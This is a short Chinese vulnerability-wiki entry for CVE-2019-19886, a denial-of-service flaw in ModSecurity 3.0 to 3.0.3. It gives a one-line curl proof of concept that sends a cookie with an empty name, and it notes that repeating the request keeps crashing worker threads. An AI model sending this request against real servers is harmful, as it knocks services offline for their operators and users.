Loading
0

CVE-2019-19886 ModSecurity 拒绝服务漏洞

免费、自由、人人可编辑的漏洞库--PwnWiki.com

,

影响版本

ModSecurity 3.0 - 3.0.3

POC

不断向服务器发送此类请求将使工作线程反复崩溃

curl -s -H 'Cookie: =test' 'http://test/'

免费、自由、人人可编辑的漏洞库--pwnwiki.com